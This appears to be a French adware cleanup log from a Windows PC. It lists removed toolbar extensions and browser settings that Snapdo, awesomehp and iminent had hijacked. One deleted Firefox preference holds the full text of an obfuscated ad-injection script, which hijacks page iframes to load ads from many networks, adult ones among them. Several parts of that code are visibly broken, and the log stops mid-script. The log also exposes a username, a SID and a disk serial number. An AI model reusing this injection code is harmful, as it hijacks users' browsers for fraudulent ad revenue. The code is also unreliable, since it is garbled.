C:\Users\Audrey\AppData\Roaming\Foxit Software\Foxit Reader\StartPage\start\en_us\toolbar.mode.txt Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Foxit Software\Foxit Reader\StartPage\start\es_la\toolbar.mode.txt Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Foxit Software\Foxit Reader\StartPage\start\fr_fr\toolbar.mode.txt Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Foxit Software\Foxit Reader\StartPage\start\pt_br\toolbar.mode.txt Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Foxit Software\Foxit Reader\StartPage\start\ru_ru\toolbar.mode.txt Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\337ed59af273c758.customDestinations-ms Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPC Backup.lnk Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Mozilla\Firefox\Profiles\n7eymfj7.default\extensions\lightningnewtab@gmail.com.xpi Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Mozilla\Firefox\Profiles\n7eymfj7.default\extensions\torntv@torntv.com.xpi Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Mozilla\Firefox\Profiles\n7eymfj7.default\extensions\{36d0b446-e1c8-a62b-aa10-3be11c146ab7}\components\SmartbarFireFoxRemotePlugin_16.dll Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Mozilla\Firefox\Profiles\n7eymfj7.default\extensions\{36d0b446-e1c8-a62b-aa10-3be11c146ab7}\components\SmartbarFireFoxRemotePlugin_17.dll Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Mozilla\Firefox\Profiles\n7eymfj7.default\extensions\{36d0b446-e1c8-a62b-aa10-3be11c146ab7}\components\SmartbarFireFoxRemotePlugin_18.dll Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Mozilla\Firefox\Profiles\n7eymfj7.default\extensions\{36d0b446-e1c8-a62b-aa10-3be11c146ab7}\components\SmartbarFireFoxRemotePlugin_19.dll Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Mozilla\Firefox\Profiles\n7eymfj7.default\extensions\{36d0b446-e1c8-a62b-aa10-3be11c146ab7}\components\SmartbarFireFoxRemotePlugin_20.dll Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Mozilla\Firefox\Profiles\n7eymfj7.default\extensions\{36d0b446-e1c8-a62b-aa10-3be11c146ab7}\components\SmartbarFireFoxRemotePlugin_21.dll Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Mozilla\Firefox\Profiles\n7eymfj7.default\extensions\{36d0b446-e1c8-a62b-aa10-3be11c146ab7}\components\SmartbarFireFoxRemotePlugin_22.dll Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Mozilla\Firefox\Profiles\n7eymfj7.default\extensions\{36d0b446-e1c8-a62b-aa10-3be11c146ab7}\components\SmartbarFireFoxRemotePlugin_23.dll Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Mozilla\Firefox\Profiles\n7eymfj7.default\jetpack\torntv@torntv.com Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\SMART Technologies\SMART Notebook Math Edition\Toolbar.eql Supprimé avec succès : C:\Users\Audrey\Downloads\adt-bundle-windows-x86_64-20131030\adt-bundle-windows-x86_64-20131030\sdk\build-tools\android-4.4\renderscript\lib\intermediates Supprimé avec succès : C:\Users\Audrey\sauvegarde carte sd\openfeint\webui\dashboard\user.json Supprimé avec succès : C:\Users\Audrey\sauvegarde carte sd\openfeint\webui\javascripts\dashboard\user.js Supprimé avec succès : C:\Users\Audrey\sauvegarde carte sd\UCDownloads\cache\SubRes\xiti\3373738.xiti Supprimé avec succès : C:\Program Files (x86)\Mozilla Firefox\searchplugins\awesomehp.xml Supprimé avec succès : C:\Program Files (x86)\Mozilla Firefox\updated\searchplugins\awesomehp.xml Supprimé avec succès : C:\Users\Audrey\AppData\Local\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\UNGSWRNV\macromedia.com\support\flashplayer\sys\#zynga2-a.akamaihd.net Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Mozilla\Firefox\Profiles\n7eymfj7.default\extensions\jid0-O6MIff3eO5dIGf5Tcv8RsJDKxrs@jetpack Supprimé avec succès : C:\Users\Audrey\Downloads\adt-bundle-windows-x86_64-20131030\adt-bundle-windows-x86_64-20131030\sdk\tools\proguard\examples\annotations ¤¤¤¤¤¤¤¤¤¤ | Détournements de raccourcis Désinfecté : C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\O2 HiLink\O2 HiLink.lnk : C:\ProgramData\MobileBrServ\mbbService.exe (-hxxp://192.168.1.1?version=22.001.14.02.116) ¤¤¤¤¤¤¤¤¤¤ | Détournement internet Explorer Réparé : [HKU\S-1-5-21-407670505-2902744457-41463410-1001\Software\Microsoft\Internet Explorer\Main]|[Search Bar] : http://feed.snapdo.com/?publisher=SnapdoOCYB&dpid=SnapdoOCYB&co=FR&userid=36d0b446-e1c8-a62b-aa10-3be11c146ab7&searchtype=ds&q={searchTerms}&installDate=26/08/2013 -> http://www.google.com/ Réparé : [HKU\S-1-5-21-407670505-2902744457-41463410-1001\Software\Microsoft\Internet Explorer\Main]|[Start Page] : http://start.iminent.com/?appId=65A70DAF-AA5F-4DAF-9CF4-996314F8E449 -> http://www.google.com/ Réparé : [HKU\S-1-5-21-407670505-2902744457-41463410-1001\Software\Microsoft\Internet Explorer\Main]|[Local Page] : C:\Windows\system32\blank.htm -> C:\Windows\SysWOW64\blank.htm Réparé : [HKU\S-1-5-21-407670505-2902744457-41463410-1001\Software\Microsoft\Internet Explorer\Main]|[Search Page] : http://feed.snapdo.com/?publisher=SnapdoOCYB&dpid=SnapdoOCYB&co=FR&userid=36d0b446-e1c8-a62b-aa10-3be11c146ab7&searchtype=ds&q={searchTerms}&installDate=26/08/2013 -> http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch Réparé : [HKLM\Software\Microsoft\Internet Explorer\Main]|[Start Page] : http://www.awesomehp.com/?type=hp&ts=1392487221&from=amt&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXE1EB1NPNU2NPNU2 -> http://go.microsoft.com/fwlink/?LinkId=69157 Réparé : [HKLM\Software\Microsoft\Internet Explorer\Main]|[Default_Search_URL] : http://www.awesomehp.com/web/?type=ds&ts=1392487221&from=amt&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXE1EB1NPNU2NPNU2&q={searchTerms} -> http://go.microsoft.com/fwlink/?LinkId=54896 Réparé : [HKLM\Software\Microsoft\Internet Explorer\Main]|[Default_Page_URL] : http://www.awesomehp.com/?type=hp&ts=1392487221&from=amt&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXE1EB1NPNU2NPNU2 -> http://go.microsoft.com/fwlink/?LinkId=69157 Réparé : [HKLM\Software\Microsoft\Internet Explorer\Main]|[Search Page] : http://www.awesomehp.com/web/?type=ds&ts=1392487221&from=amt&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXE1EB1NPNU2NPNU2&q={searchTerms} -> http://go.microsoft.com/fwlink/?LinkId=54896 Réparé : [HKLM\Software\Microsoft\Internet Explorer\AboutURLs]|[Tabs] : http://www.google.com -> res://ieframe.dll/tabswelcome.htm Réparé : [HKLM64\Software\Microsoft\Internet Explorer\Main]|[Start Page] : http://www.awesomehp.com/?type=hp&ts=1392487221&from=amt&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXE1EB1NPNU2NPNU2 -> http://go.microsoft.com/fwlink/?LinkId=69157 Réparé : [HKLM64\Software\Microsoft\Internet Explorer\Main]|[Local Page] : C:\Windows\System32\blank.htm -> C:\Windows\SysWOW64\blank.htm Réparé : [HKLM64\Software\Microsoft\Internet Explorer\Main]|[Default_Search_URL] : http://www.awesomehp.com/web/?type=ds&ts=1392487221&from=amt&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXE1EB1NPNU2NPNU2&q={searchTerms} -> http://go.microsoft.com/fwlink/?LinkId=54896 Réparé : [HKLM64\Software\Microsoft\Internet Explorer\Main]|[Default_Page_URL] : http://www.awesomehp.com/?type=hp&ts=1392487221&from=amt&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXE1EB1NPNU2NPNU2 -> http://go.microsoft.com/fwlink/?LinkId=69157 Réparé : [HKLM64\Software\Microsoft\Internet Explorer\Main]|[Search Page] : http://www.awesomehp.com/web/?type=ds&ts=1392487221&from=amt&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXE1EB1NPNU2NPNU2&q={searchTerms} -> http://go.microsoft.com/fwlink/?LinkId=54896 Réparé : [HKU\S-1-5-21-407670505-2902744457-41463410-1001\Software\Microsoft\Windows\CurrentVersion\Internet settings]|[WarnonZoneCrossing] : 0 -> 1 ¤¤¤¤¤¤¤¤¤¤ | Détournement Google Chrome [Audrey] Remis a zéro avec succès : SearchURL [Audrey] Remis a zéro avec succès : Preferences ¤¤¤¤¤¤¤¤¤¤ | Détournement Firefox [Audrey] Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Mozilla\Firefox\Profiles\n7eymfj7.default\sessionstore.js [Audrey] Remplacé : user_pref("browser.newtab.url", "http://www.awesomehp.com/newtab/?type=nt&ts=1392487221&from=amt&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXE1EB1NPNU2NPNU2"); -> user_pref("browser.newtab.url", "http://www.google.fr"); [Audrey] Remplacé : user_pref("browser.search.defaultenginename", "awesomehp"); -> user_pref("browser.search.defaultenginename", "google"); [Audrey] Remplacé : user_pref("browser.startup.homepage", "http://start.iminent.com/?appId=65A70DAF-AA5F-4DAF-9CF4-996314F8E449"); -> user_pref("browser.startup.homepage", "http://www.google.fr"); [Audrey] Supprimé avec succès : user_pref("extensions.2azG9x.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1){return}}catch(e){};var _wlst={lsKey:\"ssjsmn2ja8ddw2a\",get:function(b,a){if(window.self.location.protocol==\"https:\" || 3>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['cpx_bet_55',861],['saymedia_apx_tag_test',113],['mindads_rmx_new',122],['adorika_vmakro',76],['ybrant_csgwl',660],['mindads_apx',40],['mango_rmx',21],['deliads_apx1',63],['mediashakers_rmx_new',151],['startmeapp_gen_tier2',149],['dsnr_ds2014',184],['webisaba_us_fr_de',395],['dsnr_top2',132],['adperium_rmx_new',98],['velismedia_tier2',1474],['blutonic_apx',149],['moriads_rmx',31],['cpx_cyber3_cpm2',330],['xertive_rmx_block',99],['media888_nontb',116],['mari_nontb6',704],['xertive_apx3',378],['matomy_adj14',1013],['matomy_adj14_2',1019],['adstract_new_1',244],['web3_apx_tier2',208],['mediawhite_nontb4',364],['eviral_apx_new',256],['yashi_apx',32],['cpx_favor_cpm2',317],['adnetwork_adnttb',201]],[['cpx_nontb30_tr',966],['adstract_strm_1',301],['mari_strm10',661],['mari_strm10_2',613],['mari_strm_tier1_4',814],['matomy_strm13_2',2642],['matomy_strm13',2641],['dsnr_strm_legal',311],['web3_strm_tb',51],['ybrant_apx_strm2',1000]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function(b){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('pMhqU85i=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"tr.adsplats.com\"||window.self.location.hostname==\"ad.co-co-co.co\"||window.self.location.hostname==\"ads.yahoo.com\"||window.self.location.hostname==\"a.adorika.net\"||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"ads.deliads.com\"||window.self.location.hostname==\"ads.blutonic.com\"||window.self.location.hostname==\"servedby.adsplats.com\"||window.self.location.hostname==\"v2.ministerial5.com\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=287609')>-1|| _zyad.location.indexOf('=458516')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1005')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i=a-7&&b<=a+7},detectRsize:function(b){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function(b){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i-1||d[i].src.indexOf('=458516')>-1||d[i].src.indexOf('1018-1005')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s13329117362853508708\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a,b){_zyad.setNetwork(a[b].ifr,a[b].size);b++;a&&a[b]&&\"function\"==typeof a[b].func&&setTimeout(function(){a[b].func(a,b)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&&b){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000=e){h[d](b);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + 'pMhqU85i=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script> \\x3c/body>\\x3c/html>');}catch(e){var h = '\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script> ');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write(''+url+'');break;}try{ifr.setAttribute(\"s13329117362853508708\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{cpx_bet_55:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/cmp/1412355/index.html?size='+size+'&referrer=', (atp?atp:1), [354,size]);}}catch(e){return !1;}},saymedia_apx_tag_test:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"1957902\",\"468x60\":\"1957923\",\"160x600\":\"1957924\", \"300x250\":1957917}[size];var surl = \"http://ad.co-co-co.co/rmx/appnexus.html?id=\"+arr;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [366,size]);}}catch(e){return !1;}},mindads_rmx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'§ion=4889565&pub_url=§ion_code=764_0', (atp?atp:1), [458,size]);}}catch(e){return !1;}},adorika_vmakro:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;var rfr=window.self==window.top?encodeURIComponent(window.self.location.href):'';;return function(ifr){_zyad.iset(ifr, 'http://a.adorika.net/c/banner_s?tenant=AD&selection=8200&size='+size+'&di=1&vurl='+rfr+'&skin=iframe', (atp?atp:1), [472,size]);}}catch(e){return !1;}},ybrant_csgwl:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size == '120x60') return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'§ion=4851522&pub_url=§ion_code=764_0', (atp?atp:1), [500,size]);}}catch(e){return !1;}},mindads_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"2135522\",\"300x250\":\"2077258\",\"160x600\":\"2135538\"}[size];var surl='http://ib.adnxs.com/tt?id='+arr+'&referrer=';;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [505,size]);}}catch(e){return !1;}},mango_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60') return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'§ion=5290513&pub_url=§ion_code=764_0', (atp?atp:1), [509,size]);}}catch(e){return !1;}},deliads_apx1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '468x60 728x90 300x250 160x600 120x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"468x60\":\"2171640\",\"728x90\":\"2171638\",\"300x250\":\"2171637\",\"160x600\":\"2171635\",\"120x600\":\"2171629\"}[size];var surl='http://ads.deliads.com/tt?id='+ arr + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [524,size]);}}catch(e){return !1;}},mediashakers_rmx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'§ion=5021599&pub_url=${PUB_URL}&pub_redirect_unencoded=1&pub_redirect=INSERT%20CLICK%20TRACKER%20HERE§ion_code=764_0', (atp?atp:1), [527,size]);}}catch(e){return !1;}},startmeapp_gen_tier2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2030268&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]&pubclick=[INSERT_CLICK_TAG]', (atp?atp:1), [532,size]);}}catch(e){return !1;}},dsnr_ds2014:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '468x60 160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"468x60\":\"2162112\",\"160x600\":\"2162107\",\"300x250\":\"2162086\",\"728x90\":\"2162111\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [535,size]);}}catch(e){return !1;}},webisaba_us_fr_de:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600 120x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2249627\",\"300x250\":\"2249628\",\"160x600\":\"2249629\",\"120x600\":\"2249630\",\"468x60\":\"2249636\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [615,size]);}}catch(e){return !1;}},dsnr_top2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2162301&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [538,size]);}}catch(e){return !1;}},adperium_rmx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 300x250 468x60 728x90 160x600 300x600 320x50 320x480'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, '//ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'§ion=5321079&pub_url=www.ad-maven.com', (atp?atp:1), [561,size]);}}catch(e){return !1;}},velismedia_tier2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"120x600\":\"2194627\",\"160x600\":\"2194628\",\"300x250\":\"2194626\",\"468x60\":\"2194629\",\"728x90\":\"2194625\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [574,size]);}}catch(e){return !1;}},blutonic_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2196577\",\"300x250\":\"2196579\",\"728x90\":\"2196581\"}[size];var surl='http://ads.blutonic.com/tt?id='+ arr + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]&pubclick=[INSERT_CLICK_TAG]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [577,size]);}}catch(e){return !1;}},moriads_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'&site=1718606§ion_code=INSERT_SECTION_CODE_HERE&pub_url=${PUB_URL}§ion_code=764_0', (atp?atp:1), [578,size]);}}catch(e){return !1;}},cpx_cyber3_cpm2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsplats.com/tt?id=2260930&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [628,size]);}}catch(e){return !1;}},xertive_rmx_block:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 120x600 468x60 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size='+size+'&site=1761014§ion_code=INSERT_SECTION_CODE_HERE&pub_url=$PUB_URL&pub_redirect_unencoded=1&pub_redirect=click_url&cb=cache_§ion_code=764_0', (atp?atp:2), [595,size]);}}catch(e){return !1;}},media888_nontb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2225524\",\"300x250\":\"2225553\",\"160x600\":\"2225545\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [598,size]);}}catch(e){return !1;}},mari_nontb6:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"120x600\":\"2250165\",\"160x600\":\"2250166\",\"300x250\":\"2250167\",\"468x60\":\"2250168\",\"728x90\":\"2250169\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [605,size]);}}catch(e){return !1;}},xertive_apx3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600 120x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2250901\",\"728x90\":\"2250920\",\"160x600\":\"2250950\",\"120x600\":\"2250969\",\"468x60\":\"2250972\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&cb=[CACHEBUSTER]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [609,size]);}}catch(e){return !1;}},matomy_adj14:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2250854\",\"728x90\":\"2250868\",\"160x600\":\"2250873\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [612,size]);}}catch(e){return !1;}},matomy_adj14_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2250867\",\"728x90\":\"2250871\",\"160x600\":\"2250883\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [613,size]);}}catch(e){return !1;}},adstract_new_1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2248816&size='+size+'', (atp?atp:1), [616,size]);}}catch(e){return !1;}},web3_apx_tier2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2251080&size='+size+'', (atp?atp:1), [619,size]);}}catch(e){return !1;}},mediawhite_nontb4:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2250338\",\"300x250\":\"2250339\",\"728x90\":\"2250340\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + 